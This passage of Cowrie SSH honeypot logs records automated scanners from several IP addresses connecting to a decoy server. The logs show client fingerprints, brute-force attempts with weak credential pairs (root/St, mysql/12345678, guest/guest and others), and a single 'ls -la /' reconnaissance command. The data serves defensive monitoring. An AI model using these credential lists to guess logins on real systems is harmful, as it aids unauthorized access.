2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:02:57.902545Z","src_ip":"212.227.125.160","session":"b95af466fff3"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"1234567","message":"login attempt [mysql/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T04:02:59.459060Z","src_ip":"212.227.125.160","session":"b95af466fff3"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:01.086436Z","src_ip":"212.227.125.160","session":"b95af466fff3"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:02.078898Z","src_ip":"121.43.208.125","session":"0df0307b344d"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:03:12.122947Z","src_ip":"212.227.235.229","session":"77962a9a98e4"}
{"eventid":"cowrie.session.closed","duration":"38.6","message":"Connection lost after 38.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:22.095939Z","src_ip":"212.227.235.229","session":"77962a9a98e4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38890,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a6ce754822b","protocol":"ssh","message":"New connection: 212.227.125.160:38890 (1.2.3.4:22) [session: 2a6ce754822b]","sensor":"my-vps","timestamp":"2025-08-31T04:03:23.541585Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40906,"dst_ip":"1.2.3.4","dst_port":22,"session":"a90db29fd95b","protocol":"ssh","message":"New connection: 212.227.125.160:40906 (1.2.3.4:22) [session: a90db29fd95b]","sensor":"my-vps","timestamp":"2025-08-31T04:03:24.504615Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:03:25.734353Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:03:25.735185Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:03:28.707580Z","src_ip":"212.227.125.160","session":"2a6ce754822b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:03:28.709096Z","src_ip":"212.227.125.160","session":"2a6ce754822b"}
{"eventid":"cowrie.login.success","username":"root","password":"St","message":"login attempt [root/St] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:03:31.918432Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:03:35.259886Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T04:03:35.260553Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43010,"dst_ip":"1.2.3.4","dst_port":22,"session":"fed1fee1519c","protocol":"ssh","message":"New connection: 212.227.235.229:43010 (1.2.3.4:22) [session: fed1fee1519c]","sensor":"my-vps","timestamp":"2025-08-31T04:03:35.413685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.130877Z","src_ip":"212.227.235.229","session":"fed1fee1519c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.131545Z","src_ip":"212.227.235.229","session":"fed1fee1519c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38440,"dst_ip":"1.2.3.4","dst_port":22,"session":"e89d0bae8038","protocol":"ssh","message":"New connection: 212.227.235.229:38440 (1.2.3.4:22) [session: e89d0bae8038]","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.184037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.184921Z","src_ip":"212.227.235.229","session":"e89d0bae8038"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.413406Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.session.closed","duration":"11.9","message":"Connection lost after 11.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.414635Z","src_ip":"212.227.125.160","session":"a90db29fd95b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:03:36.435038Z","src_ip":"212.227.235.229","session":"e89d0bae8038"}
{"eventid":"cowrie.login.success","username":"root","password":"Root12","message":"login attempt [root/Root12] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:03:37.476628Z","src_ip":"212.227.235.229","session":"e89d0bae8038"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345678","message":"login attempt [mysql/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:03:42.309554Z","src_ip":"212.227.235.229","session":"fed1fee1519c"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":47012,"dst_ip":"1.2.3.4","dst_port":22,"session":"37e1d882413c","protocol":"ssh","message":"New connection: 201.148.180.50:47012 (1.2.3.4:22) [session: 37e1d882413c]","sensor":"my-vps","timestamp":"2025-08-31T04:03:43.136881Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:03:43.564265Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:03:43.564995Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:44.207175Z","src_ip":"212.227.235.229","session":"fed1fee1519c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41996,"dst_ip":"1.2.3.4","dst_port":22,"session":"08f4ac750a07","protocol":"ssh","message":"New connection: 212.227.235.229:41996 (1.2.3.4:22) [session: 08f4ac750a07]","sensor":"my-vps","timestamp":"2025-08-31T04:03:47.576847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T04:03:47.577747Z","src_ip":"212.227.235.229","session":"08f4ac750a07"}
{"eventid":"cowrie.login.success","username":"root","password":"St","message":"login attempt [root/St] succeeded","sensor":"my-vps","timestamp":"2025-08-31T04:03:47.772509Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T04:03:47.894717Z","src_ip":"212.227.235.229","session":"08f4ac750a07"}
{"eventid":"cowrie.login.failed","username":"workshop","password":"123456","message":"login attempt [workshop/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:03:49.367680Z","src_ip":"212.227.235.229","session":"08f4ac750a07"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T04:03:49.699061Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-31T04:03:49.699902Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:50.683295Z","src_ip":"212.227.235.229","session":"08f4ac750a07"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:50.782283Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:03:50.783428Z","src_ip":"201.148.180.50","session":"37e1d882413c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53642,"dst_ip":"1.2.3.4","dst_port":22,"session":"7af7faa16750","protocol":"ssh","message":"New connection: 212.227.235.229:53642 (1.2.3.4:22) [session: 7af7faa16750]","sensor":"my-vps","timestamp":"2025-08-31T04:03:52.836854Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33334,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f3485fd22c3","protocol":"ssh","message":"New connection: 212.227.125.160:33334 (1.2.3.4:22) [session: 2f3485fd22c3]","sensor":"my-vps","timestamp":"2025-08-31T04:03:57.115436Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:03:57.725078Z","src_ip":"212.227.125.160","session":"2f3485fd22c3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T04:03:57.725771Z","src_ip":"212.227.125.160","session":"2f3485fd22c3"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T04:03:58.886853Z","src_ip":"212.227.235.229","session":"7af7faa16750"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T04:03:58.901787Z","src_ip":"212.227.235.229","session":"7af7faa16750"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"12345678","message":"login attempt [mysql/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T04:03:59.890536Z","src_ip":"212.227.125.160","session":"2f3485fd22c3"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:04:01.781688Z","src_ip":"212.227.125.160","session":"2f3485fd22c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51711,"dst_ip":"1.2.3.4","dst_port":22,"session":"37029f726988","protocol":"ssh","message":"New connection: 212.227.125.160:51711 (1.2.3.4:22) [session: 37029f726988]","sensor":"my-vps","timestamp":"2025-08-31T04:04:06.616651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T04:04:06.617626Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T04:04:06.698083Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:07.104149Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.login.failed","username":"guest","password":"12345","message":"login attempt [guest/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:08.196604Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:09.280159Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest@123","message":"login attempt [guest/guest@123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:10.362987Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.login.failed","username":"guest","password":"abc123","message":"login attempt [guest/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:11.444847Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:04:12.527869Z","src_ip":"212.227.125.160","session":"37029f726988"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T04:04:13.393851Z","src_ip":"212.227.235.229","session":"335069dc2de5"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-31T04:04:13.498821Z","src_ip":"212.227.125.160","session":"2a6ce754822b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52274,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bd8dadc5342","protocol":"ssh","message":"New connection: 212.227.125.160:52274 (1.2.3.4:22) [session: 5bd8dadc5342]","sensor":"my-vps","timestamp":"2025-08-31T04:04:17.849591Z"}
